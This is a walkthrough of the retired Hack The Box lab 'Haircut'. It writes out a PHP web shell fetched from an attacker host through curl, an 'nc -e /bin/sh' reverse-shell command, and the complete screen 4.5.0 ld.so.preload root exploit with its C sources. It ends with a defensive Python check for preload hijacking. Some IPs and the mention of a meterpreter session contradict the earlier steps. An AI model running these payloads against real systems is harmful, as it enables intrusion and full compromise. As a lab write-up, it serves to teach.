Hello friends!! Today we are going to solve another CTF challenge, “Haircut”, which is categorised as a retired lab presented by Hack the Box for online penetration testing practice. Solving the challenges in this lab is not that easy unless you have some knowledge of WAPT. Let's start and learn how to analyse a vulnerability in a network and then exploit it to retrieve the desired information.
Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are accessible online, they have static IPs. The IP of Haircut is 10.10.10.24, so let's start with nmap port enumeration.
nmap -A 10.10.10.24
From the image below, you can observe that ports 22 and 80 are open on the victim's machine.
Knowing that port 80 is open, we opened the victim's IP in a browser and saw the page shown below.
Then I used the dirbuster tool with the directory-list-2.3-medium.txt wordlist for a directory brute-force attack on http://10.10.10.24 with the PHP file extension.
As a result, it found an uploads directory with a 403 response and an exposed.php file with a 200 OK response.
When we explored http://10.10.10.24/exposed.php we found a search page for finding the location of any hairdresser.
- Visit http://10.10.10.24/exposed.php
- You will find that it executes a curl script behind the scenes.
- There is a folder called /uploads available. Let's upload our payload there.
- Without wasting time I used my PHP backdoor puck.php:
GIF8
<?php echo system($_REQUEST['puck']); ?>
- The following curl argument fetches the backdoor and saves it into the uploads directory:
http://10.10.14.28/puck.php -o uploads/puck.php
- Execute the payload by visiting
http://10.10.15.16/uploads/payload.php
Now we need to transfer our backdoor file to the target system, therefore we first need to run a Python web server on port 80 using the following command.
python -m SimpleHTTPServer 80
Once puck.php has been transferred to the target's system we still need to execute it to get a reverse connection, therefore I simply opened the following path in a web browser.
http://10.10.10.24/uploads/puck.php?puck=nc -e /bin/sh 10.10.14.28 9876
After executing the uploaded backdoor file, come back to the netcat listener.
D:\>nc -lvp 9876
listening on [any] 9876 ...
10.10.10.24: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.28] from (UNKNOWN) [10.10.10.24] 46564: NO_DATA
ls
bounce.jpg
puck.php
python3 -c 'import pty;pty.spawn("/bin/bash")'
Now let's finish the task by grabbing the user.txt and root.txt files. First I moved into the home directory and checked the files and directories inside it.
cd home
ls
Here I found a directory named maria, and after exploring it we found many files and directories. Finally I fetched user.txt from /maria/Desktop/ and read it with the cat command.
cat user.txt
Our first challenge is finished successfully; now let's move on to the second challenge.
Then, using the following command, we listed all SUID binaries owned by root.
find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
Here I noticed /usr/bin/screen-4.5.0; now let's check whether an exploit is available for it.
In a new terminal, we look for any exploit present in exploitdb for screen 4.5.0 with the help of searchsploit.
searchsploit screen 4.5.0
From the image below you can observe the highlighted exploit 41154.sh, which is a shell script for local privilege escalation.
Since I did not find a convenient way to run this shell script on the target as-is, I went with manual compilation and reviewed its code using the cat command.
cat /usr/share/exploitdb/exploits/linux/local/41154.sh
If you look at the following code you will observe that this shell script embeds two C programs, so we divided it into three parts for manual compilation.
- Copy the yellow-highlighted code, paste it into a text document and save it as libhax.c
- Copy the orange-highlighted code, paste it into a text document and save it as rootshell.c
- Finally, copy the remaining code, paste it into a text document and save it as 41154.sh
From the image below you can see that I have pasted the copied code into rootshell.c.
#include <stdio.h>
#include <unistd.h>

/* Once libhax.so has made this binary setuid root, it simply drops into a root shell. */
int main(void)
{
    char *argv[] = { "/bin/sh", NULL };
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", argv);
    return 0;
}
From the image below you can see that I have pasted the copied code into libhax.c.
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

/* Runs as a constructor when the loader preloads this library into the setuid screen
   binary: it makes /tmp/rootshell setuid root and removes the ld.so.preload entry. */
__attribute__ ((__constructor__))
void dropshell(void)
{
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
From the image below you can see that I have pasted the remaining code into 41154.sh and saved all three text documents on the desktop in a new folder named shell.
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
Let's compile our C source files manually on our local system using gcc, as shown below.
gcc -fPIC -shared -ldl -o libhax.so libhax.c
Similarly, compile rootshell.c with the following command.
gcc -o rootshell rootshell.c
From the image below you can see all the files stored in our shell folder; now let's upload them to the target's system through our previous meterpreter session.
Since /tmp is readable and writable by everyone, we upload all the files into the /tmp directory by executing the following commands.
cd /tmp
upload /root/Desktop/shell .
Again, to spawn a proper TTY shell on the target's system we need Python's pty module, therefore I ran the following command inside the meterpreter shell.
python -c 'import pty;pty.spawn("/bin/bash")'
Open the 41154.sh file, as it contains the commands for getting root privileges, shown below.
cat 41154.sh
Execute the following commands and get root.
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
cd root
Here I found the root.txt file; now let's open it with the cat command and finish our second challenge.
$ /tmp/rootshell
/tmp/rootshell
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
4c---------51
#
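The whole escalation hinges on the setuid screen binary writing "\n/tmp/libhax.so" into /etc/ld.so.preload, a file that on a healthy host normally does not exist. The audit below is an added example, not part of the original write-up: it inspects an ld.so.preload file and reports entries outside the system library directories or inside world-writable directories; the two sample files it checks (one benign entry, one mirroring the exploit) are constructed inline, and /usr/lib/libfaketime.so.1 is a hypothetical legitimate entry.

```python
import os
import stat
import tempfile

# Directories from which the dynamic loader should legitimately preload code.
TRUSTED_LIB_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64", "/usr/local/lib")


def entry_findings(lineno: int, entry: str) -> list:
    """Flag a single preload entry that points outside trusted, root-controlled paths."""
    out = []
    if not entry.startswith(TRUSTED_LIB_DIRS):
        out.append(f"line {lineno}: preload entry outside system lib dirs: {entry}")
    parent = os.path.dirname(entry) or "/"
    try:
        pst = os.stat(parent)
    except FileNotFoundError:
        return out
    if pst.st_mode & stat.S_IWOTH:  # e.g. /tmp, where any local user can drop a .so
        out.append(f"line {lineno}: {entry} lives in world-writable directory {parent}")
    return out


def audit_ld_preload(preload_path: str) -> list:
    """Return findings for an ld.so.preload file; an absent file is the healthy state."""
    findings = []
    try:
        st = os.stat(preload_path)
    except FileNotFoundError:
        return findings
    if st.st_uid != 0:
        findings.append(f"{preload_path} not owned by root (uid {st.st_uid})")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{preload_path} writable by group/others "
                        f"(mode {oct(st.st_mode & 0o777)})")
    with open(preload_path, "r", errors="replace") as fh:
        for lineno, raw in enumerate(fh, 1):
            entry = raw.strip()
            if entry:  # the exploit's leading "\x0a" yields an empty first line
                findings.extend(entry_findings(lineno, entry))
    return findings


def demo() -> dict:
    """Constructed ld.so.preload contents: one benign, one as written by the exploit."""
    samples = {"benign": "/usr/lib/libfaketime.so.1\n",  # hypothetical legitimate entry
               "hijacked": "\x0a/tmp/libhax.so"}        # what `screen -L` appended
    results = {}
    with tempfile.TemporaryDirectory() as d:
        for label, content in samples.items():
            path = os.path.join(d, f"ld.so.preload.{label}")
            with open(path, "w") as fh:
                fh.write(content)
            os.chmod(path, 0o644)
            results[label] = audit_ld_preload(path)
    return results
```

On a real host you would point audit_ld_preload at /etc/ld.so.preload from a cron job or integrity monitor and alert on any non-empty result.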
Wonderful!! We have completed the task and hacked this box.
Author: AArti Singh